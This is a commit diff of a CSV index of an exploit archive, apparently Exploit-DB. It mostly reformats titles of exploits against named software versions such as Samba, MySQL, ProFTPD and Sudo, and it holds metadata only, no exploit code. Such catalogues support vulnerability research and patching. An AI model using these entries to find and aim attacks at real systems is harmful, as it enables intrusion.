Updated 07_15_2014
This commit is contained in:
parent
5eff4e51ec
commit
9b54da834d
18 changed files with 1034 additions and 639 deletions
62
files.csv
62
files.csv
|
@ -5,10 +5,10 @@ id,file,description,date,author,platform,type,port
|
|||
4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname Buffer Overflow Exploit",2003-04-01,Andi,solaris,local,0
|
||||
5,platforms/windows/remote/5.c,"MS Windows RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
|
||||
6,platforms/php/webapps/6.php,"WordPress <= 2.0.2 (cache) Remote Shell Injection Exploit",2006-05-25,rgod,php,webapps,0
|
||||
7,platforms/linux/remote/7.pl,"Samba 2.2.x Remote Root Buffer Overflow Exploit",2003-04-07,"H D Moore",linux,remote,139
|
||||
7,platforms/linux/remote/7.pl,"Samba 2.2.x - Remote Root Buffer Overflow Exploit",2003-04-07,"H D Moore",linux,remote,139
|
||||
8,platforms/linux/remote/8.c,"SETI@home Clients Buffer Overflow Exploit",2003-04-08,zillion,linux,remote,0
|
||||
9,platforms/windows/dos/9.c,"Apache HTTP Server 2.x Memory Leak Exploit",2003-04-09,"Matthew Murphy",windows,dos,0
|
||||
10,platforms/linux/remote/10.c,"Samba 2.2.8 - Remote Root Exploit - sambal.c",2003-04-10,eSDee,linux,remote,139
|
||||
10,platforms/linux/remote/10.c,"Samba 2.2.8 - Remote Root Exploit",2003-04-10,eSDee,linux,remote,139
|
||||
11,platforms/linux/dos/11.c,"Apache <= 2.0.44 Linux Remote Denial of Service Exploit",2003-04-11,"Daniel Nystram",linux,dos,0
|
||||
12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 Module Loader Local Root Exploit",2003-04-14,KuRaK,linux,local,0
|
||||
13,platforms/windows/dos/13.c,"Chindi Server 1.0 - Denial of Service Exploit",2003-04-18,"Luca Ercoli",windows,dos,0
|
||||
|
@ -1258,7 +1258,7 @@ id,file,description,date,author,platform,type,port
|
|||
1515,platforms/php/webapps/1515.pl,"GeekLog 1.x - (error.log) Remote Commands Execution Exploit (gpc = Off)",2006-02-20,rgod,php,webapps,0
|
||||
1516,platforms/php/webapps/1516.php,"ilchClan <= 1.05g (tid) Remote SQL Injection Exploit",2006-02-20,x128,php,webapps,0
|
||||
1517,platforms/php/webapps/1517.c,"PunBB <= 2.0.10 (Register Multiple Users) Denial of Service Exploit",2006-02-20,K4P0,php,webapps,0
|
||||
1518,platforms/linux/local/1518.c,"MySQL 4.x/5.0 User-Defined Function Local Privilege Escalation Exploit",2006-02-20,"Marco Ivaldi",linux,local,0
|
||||
1518,platforms/linux/local/1518.c,"MySQL 4.x/5.0 - User-Defined Function Local Privilege Escalation Exploit",2006-02-20,"Marco Ivaldi",linux,local,0
|
||||
1519,platforms/osx/remote/1519.pm,"Mac OS X Safari Browser (Safe File) Remote Code Execution Exploit",2006-02-22,"H D Moore",osx,remote,0
|
||||
1520,platforms/windows/remote/1520.pl,"MS Windows Media Player Plugin Overflow Exploit (MS06-006)(3)",2006-02-22,"Matthew Murphy",windows,remote,0
|
||||
1521,platforms/php/webapps/1521.php,"Noahs Classifieds <= 1.3 (lowerTemplate) Remote Code Execution",2006-02-22,trueend5,php,webapps,0
|
||||
|
@ -1501,7 +1501,7 @@ id,file,description,date,author,platform,type,port
|
|||
1788,platforms/windows/remote/1788.pm,"PuTTy.exe <= 0.53 - (validation) Remote Buffer Overflow Exploit (meta)",2006-05-15,y0,windows,remote,0
|
||||
1789,platforms/php/webapps/1789.txt,"TR Newsportal <= 0.36tr1 (poll.php) Remote File Inclusion Vulnerability",2006-05-15,Kacper,php,webapps,0
|
||||
1790,platforms/php/webapps/1790.txt,"Squirrelcart <= 2.2.0 (cart_content.php) Remote Inclusion Vulnerability",2006-05-15,OLiBekaS,php,webapps,0
|
||||
1791,platforms/multiple/remote/1791.patch,"RealVNC 4.1.0 - 4.1.1 - VNC Null Authentication - Auth Bypass Patch (EXE)",2006-05-16,redsand,multiple,remote,5900
|
||||
1791,platforms/multiple/remote/1791.patch,"RealVNC 4.1.0 - 4.1.1 - VNC Null Authentication - Auth Bypass (Patch EXE)",2006-05-16,redsand,multiple,remote,5900
|
||||
1792,platforms/windows/dos/1792.txt,"GNUnet <= 0.7.0d (Empty UDP Packet) Remote Denial of Service Exploit",2006-05-15,"Luigi Auriemma",windows,dos,0
|
||||
1793,platforms/php/webapps/1793.pl,"DeluxeBB <= 1.06 (name) Remote SQL Injection Exploit (mq=off)",2006-05-15,KingOfSka,php,webapps,0
|
||||
1794,platforms/multiple/remote/1794.pm,"RealVNC 4.1.0 - 4.1.1 (Null Authentication) Auth Bypass Exploit (meta)",2006-05-15,"H D Moore",multiple,remote,5900
|
||||
|
@ -1613,7 +1613,7 @@ id,file,description,date,author,platform,type,port
|
|||
1903,platforms/php/webapps/1903.txt,"Content-Builder (CMS) 0.7.5 - Multiple Include Vulnerabilities",2006-06-11,"Federico Fazzi",php,webapps,0
|
||||
1904,platforms/php/webapps/1904.php,"blur6ex <= 0.3.462 (ID) Admin Disclosure / Blind SQL Injection Exploit",2006-06-12,rgod,php,webapps,0
|
||||
1905,platforms/php/webapps/1905.txt,"DCP-Portal 6.1.x (root) Remote File Include Vulnerability",2006-06-12,"Federico Fazzi",php,webapps,0
|
||||
1906,platforms/windows/remote/1906.py,"CesarFTP 0.99g (MKD) Remote Buffer Overflow Exploit",2006-06-12,h07,windows,remote,0
|
||||
1906,platforms/windows/remote/1906.py,"CesarFTP 0.99g - (MKD) Remote Buffer Overflow Exploit",2006-06-12,h07,windows,remote,0
|
||||
1907,platforms/php/webapps/1907.txt,"aWebNews <= 1.5 (visview.php) Remote File Include Vulnerability",2006-06-13,SpC-x,php,webapps,0
|
||||
1908,platforms/php/webapps/1908.txt,"Minerva <= 2.0.8a Build 237 (phpbb_root_path) File Include Vulnerability",2006-06-13,Kacper,php,webapps,0
|
||||
1909,platforms/php/webapps/1909.pl,"MyBulletinBoard (MyBB) < 1.1.3 - Remote Code Execution Exploit",2006-06-13,"Javier Olascoaga",php,webapps,0
|
||||
|
@ -1622,7 +1622,7 @@ id,file,description,date,author,platform,type,port
|
|||
1912,platforms/php/webapps/1912.txt,"The Bible Portal Project <= 2.12 (destination) File Include Vulnerability",2006-06-14,Kacper,php,webapps,0
|
||||
1913,platforms/php/webapps/1913.txt,"Php Blue Dragon CMS <= 2.9.1 (template.php) File Include Vulnerability",2006-06-14,"Federico Fazzi",php,webapps,0
|
||||
1914,platforms/php/webapps/1914.txt,"Content-Builder (CMS) <= 0.7.2 - Multiple Include Vulnerabilities",2006-06-14,Kacper,php,webapps,0
|
||||
1915,platforms/windows/remote/1915.pm,"CesarFTP 0.99g (MKD) Remote Buffer Overflow Exploit (meta)",2006-06-15,c0rrupt,windows,remote,0
|
||||
1915,platforms/windows/remote/1915.pm,"CesarFTP 0.99g - (MKD) Remote Buffer Overflow Exploit (meta)",2006-06-15,c0rrupt,windows,remote,0
|
||||
1916,platforms/php/webapps/1916.txt,"DeluxeBB <= 1.06 (templatefolder) Remote File Include Vulnerabilities",2006-06-15,"Andreas Sandblad",php,webapps,0
|
||||
1917,platforms/windows/local/1917.pl,"Pico Zip 4.01 (Long Filename) Buffer Overflow Exploit",2006-06-15,c0rrupt,windows,local,0
|
||||
1918,platforms/php/webapps/1918.php,"bitweaver <= 1.3 (tmpImagePath) Attachment mod_mime Exploit",2006-06-15,rgod,php,webapps,0
|
||||
|
@ -1722,7 +1722,7 @@ id,file,description,date,author,platform,type,port
|
|||
2014,platforms/windows/remote/2014.pl,"Winlpd 1.2 Build 1076 Remote Buffer Overflow Exploit",2006-07-15,"Pablo Isola",windows,remote,515
|
||||
2015,platforms/linux/local/2015.py,"Rocks Clusters <= 4.1 (umount-loop) Local Root Exploit",2006-07-15,"Xavier de Leon",linux,local,0
|
||||
2016,platforms/linux/local/2016.sh,"Rocks Clusters <= 4.1 (mount-loop) Local Root Exploit",2006-07-15,"Xavier de Leon",linux,local,0
|
||||
2017,platforms/multiple/remote/2017.pl,"Webmin < 1.290 / Usermin < 1.220 Arbitrary File Disclosure Exploit (perl)",2006-07-15,UmZ,multiple,remote,10000
|
||||
2017,platforms/multiple/remote/2017.pl,"Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure Exploit (perl)",2006-07-15,UmZ,multiple,remote,10000
|
||||
2018,platforms/php/webapps/2018.txt,"FlushCMS <= 1.0.0-pre2 (class.rich.php) Remote Inclusion Vulnerability",2006-07-16,igi,php,webapps,0
|
||||
2019,platforms/php/webapps/2019.txt,"mail2forum phpBB Mod <= 1.2 (m2f_root_path) Remote Include Vulns",2006-07-17,OLiBekaS,php,webapps,0
|
||||
2020,platforms/php/webapps/2020.txt,"com_videodb Mambo Component <= 0.3en Remote Include Vulnerability",2006-07-17,h4ntu,php,webapps,0
|
||||
|
@ -2159,7 +2159,7 @@ id,file,description,date,author,platform,type,port
|
|||
2464,platforms/osx/local/2464.pl,"Mac OS X <= 10.4.7 - Mach Exception Handling Local Exploit (10.3.x 0day)",2006-09-30,"Kevin Finisterre",osx,local,0
|
||||
2465,platforms/php/webapps/2465.php,"BasiliX 1.1.1 (BSX_LIBDIR) Remote File Include Exploit",2006-10-01,Kacper,php,webapps,0
|
||||
2466,platforms/linux/local/2466.pl,"cPanel <= 10.8.x (cpwrap via mysqladmin) Local Root Exploit",2006-10-01,"Clint Torrez",linux,local,0
|
||||
2467,platforms/windows/remote/2467.pm,"McAfee ePo 3.5.0 / ProtectionPilot 1.1.0 (Source) Remote Exploit",2006-10-01,muts,windows,remote,81
|
||||
2467,platforms/windows/remote/2467.pm,"McAfee ePo 3.5.0 / ProtectionPilot 1.1.0 - (Source) Remote Exploit",2006-10-01,muts,windows,remote,81
|
||||
2468,platforms/php/webapps/2468.txt,"BBaCE <= 3.5 (includes/functions.php) Remote File Include Vulnerability",2006-10-02,SpiderZ,php,webapps,0
|
||||
2469,platforms/php/webapps/2469.pl,"JAF CMS <= 4.0 RC1 (forum.php) Remote File Include Exploit",2006-10-03,Kacper,php,webapps,0
|
||||
2470,platforms/php/webapps/2470.txt,"phpMyProfiler <= 0.9.6 - Remote File Include Vulnerability",2006-10-03,mozi,php,webapps,0
|
||||
|
@ -2701,7 +2701,7 @@ id,file,description,date,author,platform,type,port
|
|||
3026,platforms/php/webapps/3026.txt,"Bubla <= 1.0.0rc2 (bu/process.php) Remote File Include Vulnerability",2006-12-27,DeltahackingTEAM,php,webapps,0
|
||||
3027,platforms/php/webapps/3027.txt,"Fantastic News <= 2.1.4 - Multiple Remote File Include Vulnerabilities",2006-12-27,Mr-m07,php,webapps,0
|
||||
3028,platforms/php/webapps/3028.txt,"Limbo CMS Module event 1.0 - Remote File Include Vulnerability",2006-12-27,"Mehmet Ince",php,webapps,0
|
||||
3029,platforms/php/webapps/3029.php,"Cacti <= 0.8.6i cmd.php popen() Remote Injection Exploit",2006-12-27,rgod,php,webapps,0
|
||||
3029,platforms/php/webapps/3029.php,"Cacti <= 0.8.6i - cmd.php popen() Remote Injection Exploit",2006-12-27,rgod,php,webapps,0
|
||||
3030,platforms/windows/dos/3030.html,"RealPlayer 10.5 ierpplug.dll Internet Explorer Denial of Service Exploit",2006-12-28,shinnai,windows,dos,0
|
||||
3031,platforms/asp/webapps/3031.txt,"aFAQ 1.0 (faqDsp.asp catcode) Remote SQL Injection Vulnerability",2006-12-28,ajann,asp,webapps,0
|
||||
3032,platforms/asp/webapps/3032.txt,"wywo - inout board 1.0 - Multiple Vulnerabilities",2006-12-28,ajann,asp,webapps,0
|
||||
|
@ -2941,7 +2941,7 @@ id,file,description,date,author,platform,type,port
|
|||
3271,platforms/php/webapps/3271.php,"GGCMS <= 1.1.0 RC1 Remote Code Execution Exploit",2007-02-05,Kacper,php,webapps,0
|
||||
3272,platforms/windows/dos/3272.html,"MS Internet Explorer 6 (mshtml.dll) Null Pointer Dereference Exploit",2007-02-05,AmesianX,windows,dos,0
|
||||
3273,platforms/tru64/local/3273.ksh,"HP Tru64 Alpha OSF1 5.1 - (ps) Information Leak Exploit",2007-02-06,bunker,tru64,local,0
|
||||
3274,platforms/windows/remote/3274.txt,"MySQL 4.x/5.0 User-Defined Function Command Execution Exploit (win)",2007-02-06,"Marco Ivaldi",windows,remote,3306
|
||||
3274,platforms/windows/remote/3274.txt,"MySQL 4.x/5.0 - User-Defined Function Command Execution Exploit (win)",2007-02-06,"Marco Ivaldi",windows,remote,3306
|
||||
3275,platforms/php/webapps/3275.txt,"LightRO CMS 1.0 (inhalt.php) Remote File Include Vulnerability",2007-02-06,ajann,php,webapps,0
|
||||
3276,platforms/windows/dos/3276.cpp,"FlashFXP 3.4.0 build 1145 Remote Buffer Overflow DoS Exploit",2007-02-06,Marsu,windows,dos,0
|
||||
3277,platforms/windows/dos/3277.cpp,"SmartFTP Client 2.0.1002 Remote Heap Overflow DoS Exploit",2007-02-06,Marsu,windows,dos,0
|
||||
|
@ -5342,7 +5342,7 @@ id,file,description,date,author,platform,type,port
|
|||
5717,platforms/asp/webapps/5717.txt,"I-Pos Internet Pay Online Store <= 1.3 Beta SQL Injection Vulnerability",2008-06-01,KnocKout,asp,webapps,0
|
||||
5718,platforms/windows/dos/5718.pl,"SecurityGateway 1.0.1 (username) Remote Buffer Overflow PoC",2008-06-01,securfrog,windows,dos,0
|
||||
5719,platforms/php/webapps/5719.pl,"Joomla Component JooBB 0.5.9 - Blind SQL Injection Exploit",2008-06-01,His0k4,php,webapps,0
|
||||
5720,platforms/linux/remote/5720.py,"Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit (Python)",2008-06-01,"WarCat team",linux,remote,22
|
||||
5720,platforms/linux/remote/5720.py,"Debian OpenSSL - Predictable PRNG Bruteforce SSH Exploit (Python)",2008-06-01,"WarCat team",linux,remote,22
|
||||
5721,platforms/php/webapps/5721.pl,"Joomla Component acctexp <= 0.12.x Blind SQL Injection Exploit",2008-06-02,His0k4,php,webapps,0
|
||||
5722,platforms/php/webapps/5722.txt,"Booby 1.0.1 - Multiple Remote File Inclusion Vulnerabilities",2008-06-02,HaiHui,php,webapps,0
|
||||
5723,platforms/php/webapps/5723.txt,"Joomla Component equotes 0.9.4 - Remote SQL injection Vulnerability",2008-06-02,His0k4,php,webapps,0
|
||||
|
@ -6686,7 +6686,7 @@ id,file,description,date,author,platform,type,port
|
|||
7129,platforms/multiple/local/7129.sh,"Sudo <= 1.6.9p18 - (Defaults setenv) Local Privilege Escalation Exploit",2008-11-15,kingcope,multiple,local,0
|
||||
7130,platforms/php/webapps/7130.php,"Minigal b13 (index.php list) Remote File Disclosure Exploit",2008-11-15,"Alfons Luja",php,webapps,0
|
||||
7131,platforms/php/webapps/7131.txt,"yahoo answers (id) Remote SQL Injection Vulnerability",2008-11-16,snakespc,php,webapps,0
|
||||
7132,platforms/windows/remote/7132.py,"MS Windows Server Service Code Execution Exploit (MS08-067) (2k/2k3)",2008-11-16,"Debasis Mohanty",windows,remote,445
|
||||
7132,platforms/windows/remote/7132.py,"MS Windows Server Service - Code Execution Exploit (MS08-067) (2k/2k3)",2008-11-16,"Debasis Mohanty",windows,remote,445
|
||||
7133,platforms/php/webapps/7133.txt,"FloSites Blog Multiple Remote SQL Injection Vulnerabilities",2008-11-16,Vrs-hCk,php,webapps,0
|
||||
7134,platforms/php/webapps/7134.txt,"phpstore Wholesale (track.php?id) SQL Injection Vulnerability",2008-11-16,"Hussin X",php,webapps,0
|
||||
7135,platforms/windows/local/7135.htm,"Opera 9.62 file:// Local Heap Overflow Exploit",2008-11-17,"Guido Landi",windows,local,0
|
||||
|
@ -8098,7 +8098,7 @@ id,file,description,date,author,platform,type,port
|
|||
8592,platforms/windows/local/8592.pl,"Beatport Player 1.0.0.283 - (.M3U File) Local Stack Overflow Exploit (3)",2009-05-01,Stack,windows,local,0
|
||||
8593,platforms/php/webapps/8593.txt,"pecio cms 1.1.5 (index.php language) Local File Inclusion Vulnerability",2009-05-01,SirGod,php,webapps,0
|
||||
8594,platforms/windows/local/8594.pl,"RM Downloader (.smi File) Universal Local Buffer Overflow Exploit",2009-05-01,Stack,windows,local,0
|
||||
8595,platforms/windows/local/8595.txt,"Adobe Acrobat Reader 8.1.2 – 9.0 getIcon() Memory Corruption Exploit",2009-05-04,Abysssec,windows,local,0
|
||||
8595,platforms/windows/local/8595.txt,"Adobe Acrobat Reader 8.1.2 – 9.0 - getIcon() Memory Corruption Exploit",2009-05-04,Abysssec,windows,local,0
|
||||
8596,platforms/asp/webapps/8596.pl,"Winn ASP Guestbook 1.01b Remote Database Disclosure Exploit",2009-05-04,ZoRLu,asp,webapps,0
|
||||
8597,platforms/solaris/dos/8597.c,"Solaris 10 / OpenSolaris (dtrace) Local Kernel Denial of Service PoC",2009-05-04,mu-b,solaris,dos,0
|
||||
8598,platforms/solaris/dos/8598.c,"Solaris 10 / OpenSolaris (fasttrap) Local Kernel Denial of Service PoC",2009-05-04,mu-b,solaris,dos,0
|
||||
|
@ -8684,7 +8684,7 @@ id,file,description,date,author,platform,type,port
|
|||
9204,platforms/php/webapps/9204.txt,"MiniCWB 2.3.0 (LANG) Remote File Inclusion Vulnerabilities",2009-07-20,NoGe,php,webapps,0
|
||||
9205,platforms/php/webapps/9205.txt,"mcshoutbox 1.1 (sql/xss/shell) Multiple Vulnerabilities",2009-07-20,SirGod,php,webapps,0
|
||||
9206,platforms/freebsd/dos/9206.c,"FreeBSD 7.2 (pecoff executable) Local Denial of Service Exploit",2009-07-20,"Shaun Colley",freebsd,dos,0
|
||||
9207,platforms/windows/local/9207.sh,"PulseAudio setuid Local Privilege Escalation Exploit",2009-07-20,N/A,windows,local,0
|
||||
9207,platforms/windows/local/9207.sh,"PulseAudio setuid - Local Privilege Escalation Exploit",2009-07-20,N/A,windows,local,0
|
||||
9208,platforms/linux/local/9208.txt,"PulseAudio (setuid) Priv. Escalation Exploit (ubu/9.04)(slack/12.2.0)",2009-07-20,N/A,linux,local,0
|
||||
9209,platforms/hardware/remote/9209.txt,"DD-WRT (httpd service) Remote Command Execution Vulnerability",2009-07-20,gat3way,hardware,remote,0
|
||||
9211,platforms/php/webapps/9211.txt,"Alibaba-clone CMS (SQL/bSQL) Remote SQL Injection Vulnerabilities",2009-07-20,"599eme Man",php,webapps,0
|
||||
|
@ -9343,7 +9343,7 @@ id,file,description,date,author,platform,type,port
|
|||
9966,platforms/windows/remote/9966.txt,"Serv-u web client 9.0.0.5 buffer overflow",2009-11-02,"Nikolas Rangos",windows,remote,80
|
||||
9967,platforms/asp/webapps/9967.txt,"SharePoint 2007 Team Services source code disclosure",2009-10-26,"Daniel Martin",asp,webapps,0
|
||||
9969,platforms/multiple/dos/9969.txt,"Snort <= 2.8.5 - IPv6 DoS",2009-10-23,"laurent gaffie",multiple,dos,0
|
||||
9970,platforms/windows/local/9970.txt,"South River Technologies WebDrive Service privilege escalation",2009-10-20,"bellick ",windows,local,0
|
||||
9970,platforms/windows/local/9970.txt,"South River Technologies WebDrive 9.02 build 2232 - Privilege Escalation",2009-10-20,"bellick ",windows,local,0
|
||||
9971,platforms/windows/local/9971.php,"Spider Solitaire PoC",2009-10-15,SirGod,windows,local,0
|
||||
9973,platforms/multiple/local/9973.sh,"Sun VirtualBox <= 3.0.6 - Privilege Escalation",2009-10-17,prdelka,multiple,local,0
|
||||
9974,platforms/windows/local/9974.pl,"AIMP2 Audio Converter Playlist (SEH)",2009-11-16,corelanc0d3r,windows,local,0
|
||||
|
@ -10642,7 +10642,7 @@ id,file,description,date,author,platform,type,port
|
|||
11647,platforms/windows/local/11647.pl,"Yahoo Player 1.0 - (.m3u/.pls/.ypl) Buffer Overflow Exploit (SEH)",2010-03-07,Mr.tro0oqy,windows,local,0
|
||||
11648,platforms/php/webapps/11648.txt,"bild flirt system 2.0 - index.php - (id) SQL Injection Vulnerability",2010-03-07,"Easy Laster",php,webapps,0
|
||||
11650,platforms/windows/remote/11650.c,"Apache 2.2.14 mod_isapi Dangling Pointer Remote SYSTEM Exploit",2010-03-07,"Brett Gervasoni",windows,remote,0
|
||||
11651,platforms/multiple/local/11651.txt,"Tod Miller Sudo 1.6.x before 1.6.9p21 and 1.7.x before 1.7.2p4",2010-03-07,kingcope,multiple,local,0
|
||||
11651,platforms/multiple/local/11651.txt,"Tod Miller Sudo 1.6.x < 1.6.9p21 & 1.7.x < 1.7.2p4 - Local Root Exploit",2010-03-07,kingcope,multiple,local,0
|
||||
11652,platforms/windows/dos/11652.py,"TopDownloads MP3 Player 1.0 m3u crash",2010-03-07,l3D,windows,dos,0
|
||||
11654,platforms/php/webapps/11654.txt,"DZ Auktionshaus ""V4.rgo"" (id) news.php - SQL Injection Vulnerability",2010-03-08,"Easy Laster",php,webapps,0
|
||||
11655,platforms/php/webapps/11655.txt,"TRIBISUR <= 2.0 - Local File Include Vulnerability",2010-03-08,"cr4wl3r ",php,webapps,0
|
||||
|
@ -10650,7 +10650,7 @@ id,file,description,date,author,platform,type,port
|
|||
11657,platforms/php/webapps/11657.txt,"Chaton <= 1.5.2 - Local File Include Vulnerability",2010-03-08,"cr4wl3r ",php,webapps,0
|
||||
11660,platforms/php/webapps/11660.txt,"PHP File Sharing System 1.5.1 - Multiple Vulnerabilities",2010-03-09,blake,php,webapps,0
|
||||
11661,platforms/windows/remote/11661.txt,"SAP GUI 7.10 - WebViewer3D Active-X JIT-Spray Exploit",2010-03-09,"Alexey Sintsov",windows,remote,0
|
||||
11662,platforms/multiple/remote/11662.txt,"Apache Spamassassin Milter Plugin Remote Root Command Execution",2010-03-09,kingcope,multiple,remote,0
|
||||
11662,platforms/multiple/remote/11662.txt,"Apache Spamassassin Milter Plugin - Remote Root Command Execution",2010-03-09,kingcope,multiple,remote,0
|
||||
11663,platforms/windows/local/11663.txt,"Lenovo Hotkey Driver <= 5.33 - Privilege Escalation",2010-03-09,"Chilik Tamir",windows,local,0
|
||||
11666,platforms/php/webapps/11666.txt,"Uebimiau Webmail 3.2.0-2.0 - Email Disclosure",2010-03-09,"Z3r0c0re, R4vax",php,webapps,0
|
||||
11667,platforms/php/webapps/11667.txt,"Joomla Component com_hezacontent 1.0 - SQL injection Vulnerability (id)",2010-03-09,kaMtiEz,php,webapps,0
|
||||
|
@ -13262,7 +13262,7 @@ id,file,description,date,author,platform,type,port
|
|||
15300,platforms/php/webapps/15300.txt,"Squirrelcart PRO 3.0.0 - Blind SQL Injection Vulnerability",2010-10-21,"Salvatore Fresta",php,webapps,0
|
||||
15301,platforms/windows/dos/15301.pl,"Altova DatabaseSpy 2011 Project File Handling Buffer Overflow Vulnerability",2010-10-21,LiquidWorm,windows,dos,0
|
||||
15302,platforms/windows/dos/15302.py,"Spider Player 2.4.5 - Denial of Service Vulnerability",2010-10-22,"MOHAMED ABDI",windows,dos,0
|
||||
15304,platforms/linux/local/15304.txt,"GNU C library dynamic linker LD_AUDIT arbitrary DSO load Vulnerability",2010-10-22,"Tavis Ormandy",linux,local,0
|
||||
15304,platforms/linux/local/15304.txt,"GNU C library dynamic linker LD_AUDIT - Arbitrary DSO Load Vulnerability (Local Root)",2010-10-22,"Tavis Ormandy",linux,local,0
|
||||
15305,platforms/windows/dos/15305.pl,"RarmaRadio <= 2.53.1 (.m3u) Denial of Service vulnerability",2010-10-23,anT!-Tr0J4n,windows,dos,0
|
||||
15306,platforms/win32/dos/15306.pl,"AnyDVD <= 6.7.1.0 - Denial of Service",2010-10-23,Havok,win32,dos,0
|
||||
15307,platforms/windows/dos/15307.py,"HP Data Protector Media Operations 6.11 HTTP Server Remote Integer Overflow DoS",2010-10-23,d0lc3,windows,dos,0
|
||||
|
@ -13386,7 +13386,7 @@ id,file,description,date,author,platform,type,port
|
|||
15445,platforms/windows/remote/15445.txt,"femitter ftp server 1.04 - Directory Traversal vulnerability",2010-11-06,chr1x,windows,remote,0
|
||||
15447,platforms/php/webapps/15447.txt,"phpCow 2.1 - File Inclusion Vulnerability",2010-11-06,ViRuS_HiMa,php,webapps,0
|
||||
15448,platforms/asp/webapps/15448.txt,"pilot cart 7.3 - Multiple Vulnerabilities",2010-11-07,Ariko-Security,asp,webapps,0
|
||||
15449,platforms/linux/remote/15449.pl,"ProFTPD IAC Remote Root Exploit",2010-11-07,kingcope,linux,remote,0
|
||||
15449,platforms/linux/remote/15449.pl,"ProFTPD IAC - Remote Root Exploit",2010-11-07,kingcope,linux,remote,0
|
||||
15450,platforms/windows/remote/15450.txt,"filecopa ftp server 6.01 - Directory Traversal",2010-11-07,"Pawel Wylecial",windows,remote,21
|
||||
15451,platforms/php/webapps/15451.pl,"DeluxeBB <= 1.3 Private Info Disclosure",2010-11-07,"Vis Intelligendi",php,webapps,0
|
||||
15452,platforms/php/webapps/15452.txt,"Punbb 1.3.4 - Multiple Full Path Disclosure Vulnerability",2010-11-07,SYSTEM_OVERIDE,php,webapps,0
|
||||
|
@ -13493,7 +13493,7 @@ id,file,description,date,author,platform,type,port
|
|||
15584,platforms/windows/local/15584.txt,"Native Instruments Service Center 2.2.5 - Local Privilege Escalation Vulnerability",2010-11-20,LiquidWorm,windows,local,0
|
||||
15585,platforms/php/webapps/15585.txt,"Joomla Component (com_jimtawl) Local File Inclusion Vulnerability",2010-11-20,Mask_magicianz,php,webapps,0
|
||||
15588,platforms/php/webapps/15588.txt,"s-cms 2.5 - Multiple Vulnerabilities",2010-11-20,LordTittiS,php,webapps,0
|
||||
15589,platforms/windows/local/15589.wsf,"Windows Task Scheduler Privilege Escalation 0day",2010-11-20,webDEViL,windows,local,0
|
||||
15589,platforms/windows/local/15589.wsf,"Windows Task Scheduler - Privilege Escalation (0day)",2010-11-20,webDEViL,windows,local,0
|
||||
15590,platforms/php/webapps/15590.txt,"vBulletin 4.0.8 PL1 XSS Filter Bypass within Profile Customization",2010-11-20,MaXe,php,webapps,0
|
||||
15592,platforms/php/webapps/15592.txt,"sahitya graphics cms Multiple Vulnerabilities",2010-11-21,"Dr.0rYX AND Cr3W-DZ",php,webapps,0
|
||||
15593,platforms/php/webapps/15593.html,"Cpanel 11.x - Edit E-mail Cross Site Request Forgery exploit",2010-11-21,"Mon7rF .",php,webapps,0
|
||||
|
@ -15668,7 +15668,7 @@ id,file,description,date,author,platform,type,port
|
|||
18080,platforms/linux/local/18080.c,"Linux <= 2.6.37-rc1 serial_multiport_struct Local Info Leak Exploit",2011-11-04,"Todor Donev",linux,local,0
|
||||
18081,platforms/php/webapps/18081.txt,"WHMCS 3.x.x (clientarea.php) Local File Disclosure",2011-11-04,"red virus",php,webapps,0
|
||||
18082,platforms/windows/local/18082.rb,"Mini-Stream 3.0.1.1 - Buffer Overflow Exploit",2011-11-04,metasploit,windows,local,0
|
||||
18083,platforms/php/webapps/18083.php,"Zenphoto <= 1.4.1.4 (ajax_create_folder.php) Remote Code Execution",2011-11-05,EgiX,php,webapps,0
|
||||
18083,platforms/php/webapps/18083.php,"Zenphoto <= 1.4.1.4 - (ajax_create_folder.php) Remote Code Execution",2011-11-05,EgiX,php,webapps,0
|
||||
18084,platforms/php/webapps/18084.php,"phpMyFAQ <= 2.7.0 (ajax_create_folder.php) Remote Code Execution",2011-11-05,EgiX,php,webapps,0
|
||||
18085,platforms/php/webapps/18085.php,"aidiCMS 3.55 - (ajax_create_folder.php) Remote Code Execution",2011-11-05,EgiX,php,webapps,0
|
||||
18086,platforms/linux/local/18086.c,"Calibre E-Book Reader Local Root",2011-11-05,zx2c4,linux,local,0
|
||||
|
@ -16205,7 +16205,7 @@ id,file,description,date,author,platform,type,port
|
|||
18772,platforms/php/webapps/18772.txt,"Havalite CMS 1.0.4 - Multiple Vulnerabilities",2012-04-23,Vulnerability-Lab,php,webapps,0
|
||||
18773,platforms/php/webapps/18773.txt,"exponentcms 2.0.5 - Multiple Vulnerabilities",2012-04-23,"Onur Y?lmaz",php,webapps,0
|
||||
18774,platforms/windows/dos/18774.txt,"Mobipocket Reader 6.2 Build 608 Buffer Overflow",2012-04-23,shinnai,windows,dos,0
|
||||
18775,platforms/php/webapps/18775.php,"WebCalendar <= 1.2.4 (install/index.php) Remote Code Execution",2012-04-23,EgiX,php,webapps,0
|
||||
18775,platforms/php/webapps/18775.php,"WebCalendar <= 1.2.4 - (install/index.php) Remote Code Execution",2012-04-23,EgiX,php,webapps,0
|
||||
18776,platforms/windows/dos/18776.txt,"BeyondCHM 1.1 - Buffer Overflow",2012-04-24,shinnai,windows,dos,0
|
||||
18777,platforms/windows/dos/18777.txt,".NET Framework EncoderParameter Integer Overflow Vulnerability",2012-04-24,"Akita Software Security",windows,dos,0
|
||||
18778,platforms/php/webapps/18778.txt,"PHP Ticket System Beta 1 (index.php p parameter) SQL Injection",2012-04-24,G13,php,webapps,0
|
||||
|
@ -18971,7 +18971,7 @@ id,file,description,date,author,platform,type,port
|
|||
21729,platforms/cgi/webapps/21729.txt,"Mozilla Bonsai Multiple Cross Site Scripting Vulnerabilities",2002-08-20,"Stan Bubrouski",cgi,webapps,0
|
||||
21730,platforms/cgi/webapps/21730.txt,"Mozilla Bonsai 1.3 Path Disclosure Vulnerability",2002-08-20,"Stan Bubrouski",cgi,webapps,0
|
||||
21731,platforms/novell/remote/21731.pl,"Novell NetWare 5.1/6.0 HTTP Post Arbitrary Perl Code Execution Vulnerability",2002-08-20,"Dan Elder",novell,remote,0
|
||||
21732,platforms/linux/local/21732.txt,"SCPOnly 2.3/2.4 SSH Environment Shell Escaping Vulnerability",2002-08-20,"Derek D. Martin",linux,local,0
|
||||
21732,platforms/linux/local/21732.txt,"SCPOnly 2.3/2.4 - SSH Environment Shell Escaping Vulnerability",2002-08-20,"Derek D. Martin",linux,local,0
|
||||
